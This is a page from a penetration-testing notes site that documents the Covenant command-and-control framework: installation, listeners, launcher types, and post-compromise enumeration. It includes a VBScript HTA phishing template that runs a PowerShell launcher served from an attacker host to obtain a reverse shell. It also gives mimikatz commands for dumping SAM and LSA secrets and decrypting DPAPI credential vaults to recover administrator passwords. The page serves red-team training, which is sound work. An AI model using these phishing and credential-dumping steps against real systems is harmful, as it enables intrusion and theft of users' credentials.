CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • Installation
  • Install Dotnet
  • Install and launch Covenant
  • Start a listener
  • Create a Launcher to get a shell
  • Launchers type
  • Local Enumeration
  • hta Email Phishing
  • Dump hashes with mimikatz
  • Cracking Credential Vault with mimikatz
  • Common issues with Covenant
  • Resources
  1. Tools

Covenant

PreviousMetasploitNextMimikatz

Last updated 2 years ago

Installation

Install Dotnet

cd /tmp  
wget https://packages.microsoft.com/config/ubuntu/21.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb 
sudo dpkg -i packages-microsoft-prod.deb 
sudo apt update -y  
sudo apt-get install -y apt-transport-https dnsutils 
sudo apt-get update  
sudo apt-get install -y dotnet-sdk-3.1 

Install and launch Covenant

sudo git clone --recurse-submodules https://github.com/ZeroPointSecurity/Covenant.git /opt/Covenant 
cd /opt/Covenant/Covenant
sudo dotnet run
  • Navigate to https://127.0.0.1:7443 set up your user and you should be good to go

Start a listener

  • This one of the first thing to do it go to the listener tab and click on create

  • Fill the field as you wish. Here is mine (Note: When playing on HTB or THM the ip will be your tun ip)

Create a Launcher to get a shell

  • Once the powershell code used you see a grunt has popped

Launchers type

  • Binary Generates a custom binary to launch grunt, does not rely on a system binary.

  • PowerShell Generates PowerShell code to launch a grunt using powershell.exe.

Local Enumeration

  • Suppose we have a grunt (a shell on the target) so we want to enumerate the target

  • Click on the grunt > Interact

  • Use Seatbelt Seatbelt -group=all

    • We will get useful info: local users, dns info (such as email domain and all), interesting files, etc.

  • Use the cmd GetDomainUser to enumerate domain users

  • Use the cmd GetNetLoggedOnUserto have a list of logged on users

  • Use the cmd GetNetLocalGroup to have a list of local group

  • etc.

hta Email Phishing

  • Create and hta file in your attacking machine:

<script language="VBScript">
  Function DoStuff()
    Dim wsh
    Set wsh = CreateObject("Wscript.Shell")
    wsh.run "<powershell command here>"
    Set wsh = Nothing
  End Function

  DoStuff
  self.close
</script>
  • Create an HTTP listener in Covenant

    • Listener > create

    • The table in listener should look like this

      Name
      ListenerType
      Status
      StartTime
      ConnectAddresses
      ConnectPort

      HTTP Listener

      HTTP

      Active

      3/7/2022 8:28:13 PM

      IP-OF-ATTACK-MACHINE

      80

    • Go to Launchers > Powershell

    • Fill up the info, be careful taht the killdate is later in the future (not in the past)

    • Click on generate

    • Copy the encoded Launcher and put it in the script above instead of <powershell command here>

    • Save the script

    • Go back to Listerners click on the listener that was just set up

    • Go to Hosted Files, in Path enter /name-of-your-script.hta

    • Click on Browse and select your script

    • And click on create

    • If we go to http://localhost/name-of-your-script.hta we should be able to download it

  • We can now send an email with a link to our reverse shell http://IP-OF-ATTACK-MACHINE/name-of-your-script.hta

  • When the user will click the link an run the script we will get our reverse shell

  • If we go to Covenant again and check in Grunt we should have a new one

  • If you are not able to execute command (they stay Uninitialized) try either of those:

    • Verify the kill date of the launcher

    • the UI may not allow changing the date. This can be fixed by deleting the /opt/Covenant/Covenant/data/covenant.db file and restarting the service. You will lose all data and need to create a new user to log in with.

Dump hashes with mimikatz

  • In a high grunt

  • We can use this to see if any plaintext info might come out Mimikatz token::elevate lsadump::secrets

  • Will dump the sam file (where password hashes are stored in windows)Mimikatz token::elevate lsadump::sam

  • Covenant will save the Crendentials in the Data section as well

Cracking Credential Vault with mimikatz

  • We need a medium integrity grunt

  • mimikatz vault::cred will show all services with persisted passwords

  • ls C:\users\user\appdata\local\microsoft\credentials will list the passwords files the smallest of the files is gemerally the one we need.

  • We then go to the tab tak in our grunt. We select Mimikatz from the list and type this task: "dpapi::cred /in:C:\users\user\appdata\local\microsoft\credentials\FILE-PREVIOUSLY-CHOSEN"

  • From the output of the task we need to keep aside the value of the guidMasterKey

  • ls C:\users\user\appdata\roaming\microsoft\protect this should list a directory with an sid value in the end

  • If you do an ls on this it should list the same path with the guidMasterKey value we previously found. We need to copy the full path, and then we go to task again and using mimikatz we need to type "dpapi::masterkey /in:C:\users\user\appdata\roaming\microsoft\protect\sid\guidMasterKey /rpc"

  • This way we will het in the end of the output the key for the domain controller which should look like this: key : 60f202bff3c6e2eaedfc4c28ac1adbdd102ec7dba401157f6f8c2056205507ed4e6d93120ebe48959751c0f2c939e515382d7ffec7bd2b129c8eb89466b31f0f

  • We need to keep this key aside

  • We go back to task and we type `"dpapi::cred /in:C:\users\user\appdata\local\microsoft\credentials\sid /masterkey:"

  • This should dump the domain password, you should see it at the end of the output:

    UserName       : domain\Administrator
    CredentialBlob : Password123!

Common issues with Covenant

  • Issue - The dashboard is acting weird and not allowing the creation of listeners, payloads, etc.

    • Solution - Delete /opt/Covenant/Covenant/data/Covenant.db and restart Covenant.

  • Issue - I can get a Grunt to connect back to Covenant, but when attempting to run commands it just sits on uninitialized and doesn't execute.

    • Solution - This is likely an issue with the Grunt kill date. It's your responsibility to pay attention to the kill date in the launcher generator to ensure it is a date and time in the future. In rare circumstances the UI may not allow changing the date. This can be fixed by deleting the /opt/Covenant/Covenant/data/Covenant.db file and restarting the service. Note you will lose all data and need to create a new user to log in with. This is a known issue with Covenant.

Resources

We can go to Launcher and choose one we need. For example if we have an initial foothold on a win machine we could use a powershell launcher

Say we wanted a powershell, we need to choose a listener so we can select the http one we just created then we just have to click generate (or Download depending on how you will use it) and use the given code. (Note: make sure to use a date later in time for the killDate)

Shellcode Converts binary to shellcode using

MSBuild Generates an MSBuild XML file to launch a grunt using

InstallUtil Generates an InstallUtil XML file to launch a grunt using

Mshta Generates an HTA file to launch a grunt using

Regsrv32 Generates an SCT file to launch a grunt using

Wmic Generates an XSL file to launch a grunt using

Cscript Generate a JScript file to launch a grunt using

Wscript Generate a JScript file to launch a grunt using

donut
msbuild.exe
installutil.exe
mshta.exe
regsrv32.exe
wmic.exe
cscript.exe
wscript.exe
GitHub - cobbr/Covenant: Covenant is a collaborative .NET C2 framework for red teamers.GitHub
Get Covenant here
Movement, Pivoting and Persistence for Pentesters and Ethical Hackers
Movement Pivoting and Persistence - TCM Security Academy
Logo
Logo
image
image
image
image